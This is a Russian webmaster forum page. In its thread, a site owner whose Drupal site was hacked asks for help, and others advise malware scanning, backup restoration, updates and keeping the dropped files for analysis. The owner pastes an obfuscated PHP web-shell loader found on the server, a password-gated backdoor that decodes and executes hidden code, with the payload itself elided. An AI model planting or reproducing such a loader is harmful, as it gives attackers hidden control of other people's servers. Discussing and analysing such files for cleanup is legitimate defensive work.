- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
В общем, проблема оказалась глубже. Сайт вероятно взломали. Не вероятно даже, а точно. Итак, заметил с того, что перестали грузиться картинки с ошибкой 0. (drupal). Затем полез на сервер. Увидел там три странных файла. pass.php, mod_confi.php и mod_config.php. Удалил их. Поменял пароли все. Однако тут же появились ещё файлы ws.php и только что снова pas.php
Содержание файла такое: "<?php $_f__g_='base'.(128/2).'_de'.'code';$_f__g_=$_f__g_(str_replace("\n", '', 'Хренов Код
'));$_f_g_=isset($_POST['_f_g_'])?$_POST['_f_g_']:(isset($_COOKIE['_f_g_'])?$_COOKIE['_f_g_']:NULL);if($_f_g_!==NULL){$_f_g_=md5($_f_g_).substr(MD5(strrev($_f_g_)),0,strlen($_f_g_));for($_f___g_=0;$_f___g_<15595;$_f___g_++){$_f__g_[$_f___g_]=chr(( ord($_f__g_[$_f___g_])-ord($_f_g_[$_f___g_]))%256);$_f_g_.=$_f__g_[$_f___g_];}if($_f__g_=@gzinflate($_f__g_)){if(isset($_POST['_f_g_']))@setcookie('_f_g_', $_POST['_f_g_']);$_f___g_=create_function('',$_f__g_);unset($_f_g_,$_f__g_);$_f___g_();}}?><form method="post" action=""><input type="text" name="_f_g_" value=""/><input type="submit" value=">"/></form>
Никто не может помочь разобраться с проблемой?
idante, В помощь вам AI-Bolit, сканируйте а потом смотрите отчет что там за кака у вас.
Теперь не могу войти даже через /user/login на сайт
---------- Добавлено 10.08.2015 в 19:52 ----------
Через users зашел. И вот, что выдало. Что я под пользователем Артем Подчернин https://www.facebook.com/artem.podchernin.5?ref=br_rs
Что бы это могло значить?
Вам нужен бекап базы и файлов
Переустановите дивжок и модули заново, накатите базу, сделайте апгрейт до последней версии
Andreyka, Восстановить из бекапа это конечно просто, но желательно до этого найти дыру чере которую залили всю эту каку и прикрыть ее. А то можно восстановить и через сутки снова через ту же дыру...
как предложили выше, проверяете ай-болитом, затем обновляете движок и модули, затем меняете пароли.
P.S. для "помочь разобраться" есть раздел работы.
Если у вас сайт на Drupal и вы его давно не обновляли, то в этом и причина.
У вас где то в коде шелл конструктор, который инициализируется вместе с друпалом.
Нужно рыть и искать. Поднимать логи, доступ в админку закройте через htaccess, хотя при наличии шелла внутри сайта, это вряд ли поможет.
Файлы лучше не просто удалять, а копии делать, чтобы понять для каких целей взлом сайта. Или там связка будет или шелл под спам или слив трафа - от этого уже плясать дальше.